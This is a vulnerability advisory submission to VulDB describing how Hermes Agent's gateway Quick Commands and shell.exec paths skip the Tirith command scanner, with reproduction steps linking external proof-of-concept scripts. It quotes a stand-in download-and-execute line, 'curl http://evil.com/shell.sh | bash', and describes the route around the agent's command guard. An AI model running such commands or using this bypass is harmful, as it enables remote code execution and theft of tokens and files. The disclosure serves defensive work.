Submit #845595: NousResearch Hermes Agent 75cbdfd06bb041936f164c8d75ac518b2cb4fec0 Protection Mechanism Failure (CWE-693)info

TitleNousResearch Hermes Agent 75cbdfd06bb041936f164c8d75ac518b2cb4fec0 Protection Mechanism Failure (CWE-693)
Description# Technical Details A Pre-Execution Security Scanner Bypass exists in the `command.dispatch` quick-command execution path and the `shell.exec` JSON-RPC method in `tui_gateway/server.py` and `gateway/run.py` of Hermes Agent. The application fails to route gateway shell execution paths through the centralized `check_all_command_guards()` wrapper and the Tirith pre-execution scanner. Quick Commands execute configured shell commands directly with `subprocess.run(..., shell=True)` or `asyncio.create_subprocess_shell()`, while `shell.exec` only applies the simpler `detect_dangerous_command()` matcher and omits Tirith scanning. This bypasses defense-in-depth checks intended to block obfuscated shell payloads, Unicode attacks, homograph attacks, and dangerous pipe chains such as `curl | bash`. # Vulnerable Code File: `tui_gateway/server.py` Method: `command.dispatch` Why: The quick-command `exec` path runs configured commands with `subprocess.run(..., shell=True)` without invoking `check_all_command_guards()` or the Tirith scanner. File: `gateway/run.py` Method: `command.dispatch` Why: The standard gateway quick-command `exec` path launches commands with `asyncio.create_subprocess_shell()` after only environment sanitization, leaving Tirith checks unenforced. File: `tui_gateway/server.py` Method: `shell.exec` Why: The JSON-RPC shell execution method calls only `detect_dangerous_command()` before shell execution and does not invoke the centralized Tirith-backed guard path. # Reproduction 1. Run Hermes Agent with the TUI or generic Gateway enabled and Tirith installed/enabled. 2. Download the control script from `https://gist.github.com/YLChen-007/506db0a59d1c85e177dffd166ab29f7a` and run `python3 control-agent_terminal_path.py < /dev/null`. 3. Observe that the secure agent terminal path invokes `check_all_command_guards()` and blocks dangerous commands such as `curl http://evil.com/shell.sh | bash`. 4. Download the bypass PoC from `https://gist.github.com/YLChen-007/0584ffe042773f22eea72ef83c872775`. 5. Run `python3 poc_tirith_bypass.py`. 6. Observe that the same malicious payloads execute through gateway Quick Commands or `shell.exec` without Tirith being called. # Impact - Security-control bypass leading to Remote Code Execution with the privileges of the Hermes Agent daemon. - Attackers with TUI JSON-RPC access or the ability to trigger configured Quick Commands can bypass advanced command scanning. - Successful exploitation may compromise host infrastructure, API tokens, local files, and service availability.
Source⚠️ https://gist.github.com/YLChen-007/3b11589740dcf16b152b0929e1b3d024
User
 Eric-a (UID 96353)
Submission06/02/2026 03:34 (1 month ago)
Moderation07/03/2026 19:07 (1 month later)
StatusAccepted
VulDB entry376141 [NousResearch hermes-agent up to 0.15.2 tui_gateway/server.py shell.exec protection mechanism]
Points20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!